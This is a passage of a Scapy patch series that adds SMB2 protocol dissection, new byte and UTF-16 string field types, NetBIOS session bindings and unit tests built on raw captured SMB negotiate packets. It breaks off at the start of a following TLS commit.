tuple)): + return sum(d * (256 ** i) for i, d in enumerate(x)) + + def i2repr(self, pkt, x): + if isinstance(x, integer_types): + return '%i' % x + return super(NBytesField, self).i2repr(pkt, x) + + def addfield(self, pkt, s, val): + return s + self.struct.pack(*self.i2m(pkt, val)) + + def getfield(self, pkt, s): + return s[self.sz:], self.m2i(pkt, self.struct.unpack(s[:self.sz])) + + +class XNBytesField(NBytesField): + def i2repr(self, pkt, x): + if isinstance(x, integer_types): + return '0x%x' % x + # x can be a tuple when coming from struct.unpack (from getfield) + if isinstance(x, (list, tuple)): + return "0x" + "".join("%02x" % b for b in x) + return super(XNBytesField, self).i2repr(pkt, x) + + class SignedByteField(Field): def __init__(self, name, default): Field.__init__(self, name, default, "b") @@ -1009,6 +1050,22 @@ def randval(self): return RandBin(RandNum(0, 1200)) +class StrFieldUtf16(StrField): + def h2i(self, pkt, x): + return plain_str(x).encode('utf-16')[2:] + + def any2i(self, pkt, x): + if isinstance(x, six.text_type): + return self.h2i(pkt, x) + return super(StrFieldUtf16, self).any2i(pkt, x) + + def i2repr(self, pkt, x): + return x + + def i2h(self, pkt, x): + return bytes_encode(x).decode('utf-16') + + class PacketField(StrField): __slots__ = ["cls"] holds_packets = 1 @@ -1369,8 +1426,16 @@ class StrLenFieldUtf16(StrLenField): def h2i(self, pkt, x): return plain_str(x).encode('utf-16')[2:] + def any2i(self, pkt, x): + if isinstance(x, six.text_type): + return self.h2i(pkt, x) + return super(StrLenFieldUtf16, self).any2i(pkt, x) + + def i2repr(self, pkt, x): + return x + def i2h(self, pkt, x): - return x.decode('utf-16') + return bytes_encode(x).decode('utf-16') class BoundStrLenField(StrLenField): diff --git a/scapy/layers/netbios.py b/scapy/layers/netbios.py index c42b455b5ea..8eb3e740468 100644 --- a/scapy/layers/netbios.py +++ b/scapy/layers/netbios.py @@ -289,5 +289,7 @@ class NBTSession(Packet): bind_layers(NBNSNodeStatusResponseService, NBNSNodeStatusResponseEnd, ) bind_layers(UDP, NBNSWackResponse, sport=137) bind_layers(UDP, NBTDatagram, dport=138) -bind_layers(TCP, NBTSession, dport=139) bind_layers(TCP, NBTSession, dport=445) +bind_layers(TCP, NBTSession, sport=445) +bind_layers(TCP, NBTSession, dport=139) +bind_layers(TCP, NBTSession, sport=139) diff --git a/scapy/layers/smb.py b/scapy/layers/smb.py index 9ee82f31a27..748be488f1c 100644 --- a/scapy/layers/smb.py +++ b/scapy/layers/smb.py @@ -12,6 +12,7 @@ LEFieldLenField, LEIntField, LELongField, LEShortField, ShortField, \ StrFixedLenField, StrLenField, StrNullField from scapy.layers.netbios import NBTSession +from scapy.layers.smb2 import SMB2_Header # SMB NetLogon Response Header @@ -158,6 +159,8 @@ def dispatch_hook(cls, _pkt=None, *args, **kargs): if _pkt and len(_pkt) >= 4: if _pkt[:4] == b'\xffSMB': return SMBNegociate_Protocol_Request_Header + if _pkt[:4] == b'\xfeSMB': + return SMB2_Header return cls # SMB Negotiate Protocol Request Tail diff --git a/scapy/layers/smb2.py b/scapy/layers/smb2.py new file mode 100644 index 00000000000..4e5596969c2 --- /dev/null +++ b/scapy/layers/smb2.py @@ -0,0 +1,304 @@ +# This file is part of Scapy +# See http://www.secdev.org/projects/scapy for more information +# Copyright (C) Philippe Biondi +# This program is published under a GPLv2 license + +""" +SMB (Server Message Block), also known as CIFS - version 2 +""" + +from scapy.config import conf +from scapy.packet import Packet, bind_layers +from scapy.fields import StrFixedLenField, LEIntField, LEShortEnumField, \ + ShortEnumField, XLEIntField, LEShortField, FlagsField, LELongField, \ + XLELongField, XNBytesField, FieldLenField, IntField, FieldListField, \ + XStrLenField, ShortField, IntEnumField, StrFieldUtf16, XLEShortField, \ + UUIDField, XLongField, PacketListField, PadField + + +# EnumField +SMB_DIALECTS = { + 0x0202: 'SMB 2.0.2', + 0x0210: 'SMB 2.1', + 0x0300: 'SMB 3.0', + 0x0302: 'SMB 3.0.2', + 0x0311: 'SMB 3.1.1', +} + +# EnumField +SMB2_NEGOCIATE_CONTEXT_TYPES = { + 0x0001: 'SMB2_PREAUTH_INTEGRITY_CAPABILITIES', + 0x0002: 'SMB2_ENCRYPTION_CAPABILITIES', + 0x0003: 'SMB2_COMPRESSION_CAPABILITIES', + 0x0005: 'SMB2_NETNAME_NEGOCIATE_CONTEXT_ID', +} + +# FlagField +SMB2_CAPABILITIES = { + 30: "CapabilitiesEncryption", + 29: "CapabilitiesDirectoryLeasing", + 28: "CapabilitiesPersistentHandles", + 27: "CapabilitiesMultiChannel", + 26: "CapabilitiesLargeMTU", + 25: "CapabilitiesLeasing", + 24: "CapabilitiesDFS", +} + +# EnumField +SMB2_COMPRESSION_ALGORITHMS = { + 0x0000: "None", + 0x0001: "LZNT1", + 0x0002: "LZ77", + 0x0003: "LZ77 + Huffman", + 0x0004: "Pattern_V1", +} + + +class SMB2_Header(Packet): + name = "SMB2 Header" + fields_desc = [ + StrFixedLenField("Start", b"\xfeSMB", 4), + LEShortField("HeaderLength", 0), + LEShortField("CreditCharge", 0), + LEShortField("ChannelSequence", 0), + LEShortField("Unused", 0), + ShortEnumField("Command", 0, {0x0000: "SMB2_COM_NEGOCIATE"}), + LEShortField("CreditsRequested", 0), + # XLEIntField("Flags", 0), + FlagsField("Flags", 0, 32, { + 24: "SMB2_FLAGS_SERVER_TO_REDIR", + }), + XLEIntField("ChainOffset", 0), + LELongField("MessageID", 0), + XLEIntField("ProcessID", 0), + XLEIntField("TreeID", 0), + XLELongField("SessionID", 0), + XNBytesField("Signature", 0, 16), + ] + + +class SMB2_Compression_Transform_Header(Packet): + name = "SMB2 Compression Transform Header" + fields_desc = [ + StrFixedLenField("Start", b"\xfcSMB", 4), + LEIntField("OriginalCompressedSegmentSize", 0x0), + LEShortEnumField( + "CompressionAlgorithm", 0, + SMB2_COMPRESSION_ALGORITHMS + ), + ShortEnumField("Flags", 0x0, { + 0x0000: "SMB2_COMPRESSION_FLAG_NONE", + 0x0001: "SMB2_COMPRESSION_FLAG_CHAINED", + }), + XLEIntField("Offset/Length", 0), + ] + + +class SMB2_Negociate_Context(Packet): + name = "SMB2 Negociate Context" + fields_desc = [ + LEShortEnumField("ContextType", 0x0, SMB2_NEGOCIATE_CONTEXT_TYPES), + FieldLenField("DataLength", 0x0, fmt="> 24) & 1 == 0 +) +bind_layers( + SMB2_Header, + SMB2_Negociate_Protocol_Response_Header, + Command=0x0000, + Flags=lambda f: (f >> 24) & 1 == 1 +) +bind_layers( + SMB2_Negociate_Context, + SMB2_Preauth_Integrity_Capabilities, + ContextType=0x0001 +) +bind_layers( + SMB2_Negociate_Context, + SMB2_Encryption_Capabilities, + ContextType=0x0002 +) +bind_layers( + SMB2_Negociate_Context, + SMB2_Compression_Capabilities, + ContextType=0x0003 +) +bind_layers( + SMB2_Negociate_Context, + SMB2_Netname_Negociate_Context_ID, + ContextType=0x0005 +) diff --git a/scapy/packet.py b/scapy/packet.py index fac63cd0345..3f2c3d7baa0 100644 --- a/scapy/packet.py +++ b/scapy/packet.py @@ -886,8 +886,14 @@ def guess_payload_class(self, payload): for t in self.aliastypes: for fval, cls in t.payload_guess: try: - if all(v == self.getfieldval(k) - for k, v in six.iteritems(fval)): + for k, v in six.iteritems(fval): + # case where v is a function + if callable(v): + if not v(self.getfieldval(k)): + break + elif v != self.getfieldval(k): + break + else: return cls except AttributeError: pass diff --git a/test/fields.uts b/test/fields.uts index 7a6ad10d9d3..c281fe58809 100644 --- a/test/fields.uts +++ b/test/fields.uts @@ -104,6 +104,74 @@ p = TestThreeBytesField(test1=0x123456, test2=123456, test3=0xfedbca, test4=5678 assert(raw(p) == b'\x12\x34\x56\x01\xe2\x40\xca\xdb\xfe\x52\xaa\x08') print(p.sprintf('%test1% %test2% %test3% %test4%')) assert(p.sprintf('%test1% %test2% %test3% %test4%') == '0x123456 123456 0xfedbca 567890') +assert(repr(p.test1) == '1193046') + + += NBytesField +~ field nbytesfield + +class TestNBytesField(Packet): + fields_desc = [ + NBytesField('test1', None, 7), + XNBytesField('test2', None, 5), + XNBytesField('test3', None, 11), + NBytesField('test4', None, 11), + ] + +p = TestNBytesField(test1=0x00112233445566, test2=824650445619, test3=0xffeeddccbbaa9988776655, test4=0xffeeddccbbaa9988776655) +print(raw(p)) +assert(raw(p) == b'\x00\x11\x22\x33\x44\x55\x66\xc0\x00\xff\x33\x33\xff\xee\xdd\xcc\xbb\xaa\x99\x88\x77\x66\x55\xff\xee\xdd\xcc\xbb\xaa\x99\x88\x77\x66\x55') +print(p.sprintf('%test1% %test2% %test3% %test4%')) +assert(p.sprintf('%test1% %test2% %test3% %test4%') == '18838586676582 0xc000ff3333 0xffeeddccbbaa9988776655 309404098707666285700277845') +assert(p.test1 == 0x112233445566) +assert(p.test2 == 0xc000ff3333) +assert(p.test3 == 0xffeeddccbbaa9988776655) +assert(p.test4 == 309404098707666285700277845) + + += StrField +~ field strfield +~ field strlenfield + +class TestStrField(Packet): + fields_desc = [ + LEFieldLenField('slen', None, length_of="s1"), + StrLenField('s1', None, length_from=lambda pkt: pkt.slen), + StrField('s2', None), + ] + +p = TestStrField(s1="cafe", s2="deadbeef") +assert(raw(p) == b'\x04\x00cafedeadbeef') +print(p.sprintf("%s1% %s2%")) +assert(p.sprintf("%s1% %s2%") == "'cafe' 'deadbeef'") + + += StrFieldUtf16 +~ field strfieldutf16 +~ field strlenfieldutf16 + +class TestStrLenFieldUtf16(Packet): + fields_desc = [ + LEFieldLenField('slen', None, length_of="s1"), + StrLenFieldUtf16('s1', None, length_from=lambda pkt: pkt.slen), + ] + +p = TestStrLenFieldUtf16(s1='cafe') +assert(raw(p) == b'\x08\x00c\x00a\x00f\x00e\x00') +assert(p.sprintf("%s1%") == 'cafe') + += StrFieldUtf16 +~ field strfieldutf16 +~ field strlenfieldutf16 + +class TestStrFieldUtf16(Packet): + fields_desc = [ + StrFieldUtf16('s1', None), + ] + +p = TestStrFieldUtf16(s1='cafe') +assert(raw(p) == b'c\x00a\x00f\x00e\x00') +assert(p.sprintf("%s1%") == 'cafe') ############ ############ diff --git a/test/smb2.uts b/test/smb2.uts new file mode 100644 index 00000000000..11753841785 --- /dev/null +++ b/test/smb2.uts @@ -0,0 +1,244 @@ +############ +############ +~ SMB2 + ++ SMB2 Header + += SMB2 Header dissecting + +# OK test +rawpkt = b'\x45\x00\x01\x18\x16\x2c\x40\x00\x37\x06\xc4\x14\x91\xdc\x18\x13\xc0\xa8\xfe\x07\x9d\x76\x01\xbd\x37\x06\x5e\x82\xa3\xca\x83\xd2\x50\x18\x01\xf6\x11\x5b\x00\x00\x00\x00\x00\xec\xfe\x53\x4d\x42\x40\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x22\x33\x44\x55\x66\x77\x88\x99\xaa\xbb\xcc\xdd\xee\xff\x24\x00\x04\x00\x00\x00\x00\x00\x7f\x00\x00\x00\x59\x9e\x84\xf1\x9d\x61\xce\x99\x1f\x50\x5c\x04\x44\x74\xb1\x0a\x70\x00\x00\x00\x04\x00\x00\x00\x10\x02\x00\x03\x02\x03\x11\x03\x00\x00\x00\x00\x01\x00\x26\x00\x00\x00\x00\x00\x01\x00\x20\x00\x01\x00\x75\x06\x05\xed\x60\x88\x9e\xcb\x5e\x79\xbb\xe8\x44\x59\xc5\x5c\xd2\x82\x51\x06\x32\x7a\x6e\x2e\x41\xc5\xa8\x3f\xdd\xf2\xc5\x18\x00\x00\x02\x00\x06\x00\x00\x00\x00\x00\x02\x00\x01\x00\x02\x00\x00\x00\x03\x00\x10\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x01\x00\x02\x00\x03\x00\x04\x00\x05\x00\x1c\x00\x00\x00\x00\x00\x31\x00\x39\x00\x32\x00\x2e\x00\x31\x00\x36\x00\x38\x00\x2e\x00\x31\x00\x37\x00\x38\x00\x2e\x00\x32\x00\x31\x00' +pkt = IP(rawpkt) +# Check layers +assert TCP in pkt +assert NBTSession in pkt +assert pkt[NBTSession].LENGTH == 236 +assert SMB2_Header in pkt +smb2 = pkt[SMB2_Header] +# Check header values +print(smb2.show()) +assert smb2.Start == b'\xfeSMB' +assert smb2.HeaderLength == 64 +assert smb2.CreditCharge == 1 +assert smb2.ChannelSequence == 0 +assert smb2.Command == 0 +assert smb2.CreditsRequested == 0 +assert smb2.Flags == 0 +assert smb2.ChainOffset == 0 +assert smb2.MessageID == 0 +assert smb2.ProcessID == 0 +assert smb2.TreeID == 0 +assert smb2.SessionID == 0 +assert smb2.Signature == 0xffeeddccbbaa99887766554433221100 + +# KO test +rawpkt = b'\x45\x00\x01\x18\x16\x2c\x40\x00\x37\x06\xc4\x14\x91\xdc\x18\x13\xc0\xa8\xfe\x07\x9d\x76\x01\xbd\x37\x06\x5e\x82\xa3\xca\x83\xd2\x50\x18\x01\xf6\x11\x5b\x00\x00\x00\x00\x00\xec\xf0\x53\x4d\x42\x40\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x22\x33\x44\x55\x66\x77\x88\x99\xaa\xbb\xcc\xdd\xee\xff\x24\x00\x04\x00\x00\x00\x00\x00\x7f\x00\x00\x00\x59\x9e\x84\xf1\x9d\x61\xce\x99\x1f\x50\x5c\x04\x44\x74\xb1\x0a\x70\x00\x00\x00\x04\x00\x00\x00\x10\x02\x00\x03\x02\x03\x11\x03\x00\x00\x00\x00\x01\x00\x26\x00\x00\x00\x00\x00\x01\x00\x20\x00\x01\x00\x75\x06\x05\xed\x60\x88\x9e\xcb\x5e\x79\xbb\xe8\x44\x59\xc5\x5c\xd2\x82\x51\x06\x32\x7a\x6e\x2e\x41\xc5\xa8\x3f\xdd\xf2\xc5\x18\x00\x00\x02\x00\x06\x00\x00\x00\x00\x00\x02\x00\x01\x00\x02\x00\x00\x00\x03\x00\x10\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x01\x00\x02\x00\x03\x00\x04\x00\x05\x00\x1c\x00\x00\x00\x00\x00\x31\x00\x39\x00\x32\x00\x2e\x00\x31\x00\x36\x00\x38\x00\x2e\x00\x31\x00\x37\x00\x38\x00\x2e\x00\x32\x00\x31\x00' +pkt = IP(rawpkt) +# Check layers +assert TCP in pkt +assert NBTSession in pkt +assert pkt[NBTSession].LENGTH == 236 +# Should not have a proper SMB2 Header as magic is \xf0SMB (not valid) +assert SMB2_Header not in pkt + +# KO test with compression header +rawpkt = b'\x45\x00\x01\x18\x16\x2c\x40\x00\x37\x06\xc4\x14\x91\xdc\x18\x13\xc0\xa8\xfe\x07\x9d\x76\x01\xbd\x37\x06\x5e\x82\xa3\xca\x83\xd2\x50\x18\x01\xf6\x11\x5b\x00\x00\x00\x00\x00\xec\xfc\x53\x4d\x42\x40\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x22\x33\x44\x55\x66\x77\x88\x99\xaa\xbb\xcc\xdd\xee\xff\x24\x00\x04\x00\x00\x00\x00\x00\x7f\x00\x00\x00\x59\x9e\x84\xf1\x9d\x61\xce\x99\x1f\x50\x5c\x04\x44\x74\xb1\x0a\x70\x00\x00\x00\x04\x00\x00\x00\x10\x02\x00\x03\x02\x03\x11\x03\x00\x00\x00\x00\x01\x00\x26\x00\x00\x00\x00\x00\x01\x00\x20\x00\x01\x00\x75\x06\x05\xed\x60\x88\x9e\xcb\x5e\x79\xbb\xe8\x44\x59\xc5\x5c\xd2\x82\x51\x06\x32\x7a\x6e\x2e\x41\xc5\xa8\x3f\xdd\xf2\xc5\x18\x00\x00\x02\x00\x06\x00\x00\x00\x00\x00\x02\x00\x01\x00\x02\x00\x00\x00\x03\x00\x10\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x01\x00\x02\x00\x03\x00\x04\x00\x05\x00\x1c\x00\x00\x00\x00\x00\x31\x00\x39\x00\x32\x00\x2e\x00\x31\x00\x36\x00\x38\x00\x2e\x00\x31\x00\x37\x00\x38\x00\x2e\x00\x32\x00\x31\x00' +pkt = IP(rawpkt) +# Check layers +assert TCP in pkt +assert NBTSession in pkt +assert pkt[NBTSession].LENGTH == 236 +# Should not have a proper SMB2 Header as magic is \xfcSMB (compressed version) +assert SMB2_Header not in pkt + + += SMB2 Header assembling + +pkt = IP() / TCP() / NBTSession() / SMB2_Header() +assert pkt[NBTSession].TYPE == 0x00 # session message +smb2 = pkt[SMB2_Header] +assert smb2.Start == b'\xfeSMB' + + + + + + + + + + ++ SMB2 Negociate Procotol Request Header dissecting + += Common fields in header + +# OK test +rawpkt = b'\x45\x00\x01\x18\x16\x2c\x40\x00\x37\x06\xc4\x14\x91\xdc\x18\x13\xc0\xa8\xfe\x07\x9d\x76\x01\xbd\x37\x06\x5e\x82\xa3\xca\x83\xd2\x50\x18\x01\xf6\x11\x5b\x00\x00\x00\x00\x00\xec\xfe\x53\x4d\x42\x40\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x22\x33\x44\x55\x66\x77\x88\x99\xaa\xbb\xcc\xdd\xee\xff\x24\x00\x04\x00\x00\x00\x00\x00\x7f\x00\x00\x00\x59\x9e\x84\xf1\x9d\x61\xce\x99\x1f\x50\x5c\x04\x44\x74\xb1\x0a\x70\x00\x00\x00\x04\x00\x00\x00\x10\x02\x00\x03\x02\x03\x11\x03\x00\x00\x00\x00\x01\x00\x26\x00\x00\x00\x00\x00\x01\x00\x20\x00\x01\x00\x75\x06\x05\xed\x60\x88\x9e\xcb\x5e\x79\xbb\xe8\x44\x59\xc5\x5c\xd2\x82\x51\x06\x32\x7a\x6e\x2e\x41\xc5\xa8\x3f\xdd\xf2\xc5\x18\x00\x00\x02\x00\x06\x00\x00\x00\x00\x00\x02\x00\x01\x00\x02\x00\x00\x00\x03\x00\x10\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x01\x00\x02\x00\x03\x00\x04\x00\x05\x00\x1c\x00\x00\x00\x00\x00\x31\x00\x39\x00\x32\x00\x2e\x00\x31\x00\x36\x00\x38\x00\x2e\x00\x31\x00\x37\x00\x38\x00\x2e\x00\x32\x00\x31\x00' +pkt = IP(rawpkt) +# Check layers +assert TCP in pkt +assert NBTSession in pkt +assert pkt[NBTSession].LENGTH == 236 +assert SMB2_Header in pkt +assert SMB2_Negociate_Protocol_Request_Header in pkt +nego_req = pkt[SMB2_Negociate_Protocol_Request_Header] +# Check field values +assert nego_req.StructureSize == 0x24 +assert nego_req.DialectCount == 4 +assert nego_req.SecurityMode == 0 +assert nego_req.Capabilities == 0x7f000000 +assert str(nego_req.ClientGUID) == 'f1849e59-619d-99ce-1f50-5c044474b10a' +assert nego_req.NegociateContextOffset == 0x70 +assert nego_req.NegociateCount == 4 +for dialect in nego_req.Dialects: + assert dialect in SMB_DIALECTS.keys() + +# Check SMB 2.1 +assert 0x210 in nego_req.Dialects +# Check SMB 3.0 +assert 0x300 in nego_req.Dialects +# Check SMB 3.0.2 +assert 0x302 in nego_req.Dialects +# Check SMB 3.1.1 +assert 0x311 in nego_req.Dialects +assert len(nego_req.NegociateContexts) == nego_req.NegociateCount + += SMB2 Negociate Context in Request - type PREAUTH - disassemble + +preauth = nego_req.NegociateContexts[0] +assert preauth.ContextType == 0x1 +assert preauth.DataLength == 38 +assert preauth.HashAlgorithmCount == 1 +assert preauth.SaltLength == 32 +assert preauth.Salt == b'\x75\x06\x05\xed\x60\x88\x9e\xcb\x5e\x79\xbb\xe8\x44\x59\xc5\x5c\xd2\x82\x51\x06\x32\x7a\x6e\x2e\x41\xc5\xa8\x3f\xdd\xf2\xc5\x18' +assert len(preauth.HashAlgorithms) == 1 +assert preauth.HashAlgorithms[0] == 0x1 + += SMB2 Negociate Context in Request - type ENCRYPTION disassemble + +enc = nego_req.NegociateContexts[1] +assert enc.ContextType == 0x2 +assert enc.DataLength == 6 +assert enc.CipherCount == 2 +assert len(enc.Ciphers) == 2 +assert enc.Ciphers[0] == 1 +assert enc.Ciphers[1] == 2 + + += SMB2 Negociate Context in Request - type COMPRESSION + +comp = nego_req.NegociateContexts[2] +assert comp.ContextType == 0x3 +assert comp.DataLength == 16 +assert comp.CompressionAlgorithmCount == 4 +assert len(comp.CompressionAlgorithms) == 4 +assert comp.CompressionAlgorithms[0] == 1 +assert comp.CompressionAlgorithms[1] == 2 +assert comp.CompressionAlgorithms[2] == 3 +assert comp.CompressionAlgorithms[3] == 4 + + += SMB2 Negociate Context in Request - type NETNAME NEGOCIATE + +netname = nego_req.NegociateContexts[3] +assert netname.ContextType == 0x5 +assert netname.DataLength == 28 +assert netname.NetName == '192.168.178.21' + + + + + + + + + + ++ test SMB2 Negociate Protocol Request Header - assembling + +pkt = IP() / TCP() / NBTSession() / SMB2_Header() / SMB2_Negociate_Protocol_Request_Header() +assert SMB2_Negociate_Protocol_Request_Header in pkt + + + + + + + + + + ++ SMB2 Negociate Protocol Response Header dissecting + += Common fields in header + +rawpkt = b'\x45\x00\x02\x3e\x84\xa6\x40\x00\x80\x06\x0b\x74\xc0\xa8\xfe\x07\x91\xdc\x18\x13\x01\xbd\x9d\x76\xa3\xca\x83\xd2\x37\x06\x5f\x72\x50\x18\x04\x01\xe3\x14\x00\x00\x00\x00\x02\x12\xfe\x53\x4d\x42\x40\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x41\x00\x01\x00\x11\x03\x03\x00\x53\x6d\xdd\x1c\x30\x1f\x44\x42\xa5\xc8\x88\x73\x7a\x68\x05\xe1\x2f\x00\x00\x00\x00\x00\x80\x00\x00\x00\x80\x00\x00\x00\x80\x00\xe9\xbe\x9e\x6c\xa4\xf8\xd5\x01\x00\x00\x00\x00\x00\x00\x00\x00\x80\x00\x40\x01\xc0\x01\x00\x00\x60\x82\x01\x3c\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x82\x01\x30\x30\x82\x01\x2c\xa0\x1a\x30\x18\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x1e\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a\xa2\x82\x01\x0c\x04\x82\x01\x08\x4e\x45\x47\x4f\x45\x58\x54\x53\x01\x00\x00\x00\x00\x00\x00\x00\x60\x00\x00\x00\x70\x00\x00\x00\x11\x70\xff\xd0\xfa\xf1\x4f\xa2\x6f\x40\x5c\x94\x55\x68\x53\xcf\xa1\x77\x02\x7a\x32\xa9\x62\x78\x0a\x21\xfb\x9e\x2c\x5e\xe9\x78\xeb\xab\xee\x91\xfd\xfc\xda\x0f\xc5\x91\x03\x6e\xf8\xfd\x4c\x08\x00\x00\x00\x00\x00\x00\x00\x00\x60\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x5c\x33\x53\x0d\xea\xf9\x0d\x4d\xb2\xec\x4a\xe3\x78\x6e\xc3\x08\x4e\x45\x47\x4f\x45\x58\x54\x53\x03\x00\x00\x00\x01\x00\x00\x00\x40\x00\x00\x00\x98\x00\x00\x00\x11\x70\xff\xd0\xfa\xf1\x4f\xa2\x6f\x40\x5c\x94\x55\x68\x53\xcf\x5c\x33\x53\x0d\xea\xf9\x0d\x4d\xb2\xec\x4a\xe3\x78\x6e\xc3\x08\x40\x00\x00\x00\x58\x00\x00\x00\x30\x56\xa0\x54\x30\x52\x30\x27\x80\x25\x30\x23\x31\x21\x30\x1f\x06\x03\x55\x04\x03\x13\x18\x54\x6f\x6b\x65\x6e\x20\x53\x69\x67\x6e\x69\x6e\x67\x20\x50\x75\x62\x6c\x69\x63\x20\x4b\x65\x79\x30\x27\x80\x25\x30\x23\x31\x21\x30\x1f\x06\x03\x55\x04\x03\x13\x18\x54\x6f\x6b\x65\x6e\x20\x53\x69\x67\x6e\x69\x6e\x67\x20\x50\x75\x62\x6c\x69\x63\x20\x4b\x65\x79\x01\x00\x26\x00\x00\x00\x00\x00\x01\x00\x20\x00\x01\x00\x09\x33\xe9\xe8\xcb\xf4\x8a\x5c\x61\x4d\x38\x42\xa1\x53\x41\x18\x1b\xeb\x99\x78\x0b\x19\x6f\x5c\xef\xdd\x02\x51\x07\x3b\xc6\xcc\x00\x00\x02\x00\x04\x00\x00\x00\x00\x00\x01\x00\x01\x00\x00\x00\x00\x00\x03\x00\x0a\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x01\x00' +pkt = IP(rawpkt) +# Check layers +assert TCP in pkt +assert NBTSession in pkt +assert pkt[NBTSession].LENGTH == 530 +assert SMB2_Header in pkt +assert SMB2_Negociate_Protocol_Response_Header in pkt +nego_resp = pkt[SMB2_Negociate_Protocol_Response_Header] +# check field values +print(nego_resp.show()) +print(repr(nego_resp.SecurityMode)) +print(dir(nego_resp.SecurityMode)) +assert nego_resp.StructureSize == 0x41 +assert str(nego_resp.SecurityMode) == 'Signing Enabled' +assert nego_resp.Dialect == 0x0311 +assert nego_resp.NegociateCount == 0x3 +assert str(nego_resp.ServerGUID) == '1cdd6d53-1f30-4244-a5c8-88737a6805e1' +assert nego_resp.Capabilities == 0x2f000000 +assert nego_resp.MaxTransactionSize == 0x00800000 +assert nego_resp.MaxReadSize == 0x00800000 +assert nego_resp.MaxWriteSize == 0x00800000 +assert nego_resp.SecurityBufferOffset == 0x00000080 +assert nego_resp.SecurityBufferLength == 320 +assert nego_resp.NegociateContextOffset == 0x1c0 +assert nego_resp.SecurityBuffer == b"`\x82\x01<\x06\x06+\x06\x01\x05\x05\x02\xa0\x82\x0100\x82\x01,\xa0\x1a0\x18\x06\n+\x06\x01\x04\x01\x827\x02\x02\x1e\x06\n+\x06\x01\x04\x01\x827\x02\x02\n\xa2\x82\x01\x0c\x04\x82\x01\x08NEGOEXTS\x01\x00\x00\x00\x00\x00\x00\x00`\x00\x00\x00p\x00\x00\x00\x11p\xff\xd0\xfa\xf1O\xa2o@\\\x94UhS\xcf\xa1w\x02z2\xa9bx\n!\xfb\x9e,^\xe9x\xeb\xab\xee\x91\xfd\xfc\xda\x0f\xc5\x91\x03n\xf8\xfdL\x08\x00\x00\x00\x00\x00\x00\x00\x00`\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\\3S\r\xea\xf9\rM\xb2\xecJ\xe3xn\xc3\x08NEGOEXTS\x03\x00\x00\x00\x01\x00\x00\x00@\x00\x00\x00\x98\x00\x00\x00\x11p\xff\xd0\xfa\xf1O\xa2o@\\\x94UhS\xcf\\3S\r\xea\xf9\rM\xb2\xecJ\xe3xn\xc3\x08@\x00\x00\x00X\x00\x00\x000V\xa0T0R0'\x80%0#1!0\x1f\x06\x03U\x04\x03\x13\x18Token Signing Public Key0'\x80%0#1!0\x1f\x06\x03U\x04\x03\x13\x18Token Signing Public Key" +assert len(nego_resp.NegociateContexts) == 3 + += SMB2 Negociate Context in Response - Type PREAUTH + +preauth = nego_resp.NegociateContexts[0] +assert preauth.ContextType == 0x0001 +assert preauth.DataLength == 38 +assert preauth.HashAlgorithmCount == 1 +assert preauth.SaltLength == 32 +assert preauth.Salt == b"\x09\x33\xe9\xe8\xcb\xf4\x8a\x5c\x61\x4d\x38\x42\xa1\x53\x41\x18\x1b\xeb\x99\x78\x0b\x19\x6f\x5c\xef\xdd\x02\x51\x07\x3b\xc6\xcc" +assert len(preauth.HashAlgorithms) == 1 +assert preauth.HashAlgorithms[0] == 0x1 + += SMB2 Negociate Context in Response - Type ENCRYPTION + +enc = nego_resp.NegociateContexts[1] +assert enc.ContextType == 0x0002 +assert enc.DataLength == 4 +assert enc.CipherCount == 1 +assert len(enc.Ciphers) == 1 +assert enc.Ciphers[0] == 1 + += SMB2 Negociate Context in Response - Type COMPRESSION + +comp = nego_resp.NegociateContexts[2] +assert comp.ContextType == 0x0003 +assert comp.DataLength == 10 +assert comp.CompressionAlgorithmCount == 1 +assert len(comp.CompressionAlgorithms) == 1 +assert comp.CompressionAlgorithms[0] == 1 + + + + + + + + + + ++ SMB2 Negociate Protocol Response Header assembling + +pkt = IP() / TCP() / NBTSession() / SMB2_Header() / SMB2_Negociate_Protocol_Response_Header() +assert SMB2_Negociate_Protocol_Response_Header in pkt From bf8de6a3f4f81021bd432cead118be4a20bf7d62 Mon Sep 17 00:00:00 2001 From: gpotter Date: Fri, 8 May 2020 14:09:52 +0200 Subject: [PATCH 0139/1632] Minor fixes --- scapy/layers/tls/automaton_cli.py | 12 +++++------- scapy/layers/tls/automaton_srv.py | 6 +++--- scapy/layers/tls/record.py | 10 ++++------ scapy/layers/tls/session.py | 3 ++- test/tls/example_client.py | 10 +++++++--- 5 files changed, 21 insertions(+), 20 deletions(-) diff --git a/scapy/layers/tls/automaton_cli.py b/scapy/layers/tls/automaton_cli.py index 